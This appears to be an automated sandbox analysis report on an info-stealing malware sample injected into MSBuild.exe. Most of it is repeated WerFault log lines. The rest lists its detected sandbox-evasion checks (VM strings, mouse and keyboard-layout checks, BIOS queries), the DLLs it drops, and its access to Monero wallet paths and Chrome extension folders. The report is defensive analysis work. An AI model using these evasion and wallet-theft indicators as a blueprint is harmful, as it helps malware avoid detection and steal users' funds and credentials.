Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.91dad8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f1r6P3j3g7.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Country aware sample found (crashes after keyboard check)

Source: c:\users\user\desktop\f1r6p3j3g7.exe

Event Logs and Signature results: Application crash and keyboard check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: f1r6P3j3g7.exe, MSBuild.exe	Binary or memory string: DIR_WATCH.DLL
Source: f1r6P3j3g7.exe, MSBuild.exe	Binary or memory string: SBIEDLL.DLL
Source: f1r6P3j3g7.exe, MSBuild.exe	Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4216:07:4216:07:4216:07:4216:07:4216:07:42DELAYS.TMP%S%SNTDLL.DLL

Contains functionality to detect sandboxes (mouse cursor move detection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	API coverage: 4.0 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 6.7 %
Source: C:\ProgramData\KEGIDHJKKJ.exe	API coverage: 4.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6984	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2212	Thread sleep count: 77 > 30			Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00909ABF FindFirstFileExW,	0_2_00909ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_0040CD37
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D19ABF FindFirstFileExW,	10_2_00D19ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2205846539.000000000114C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
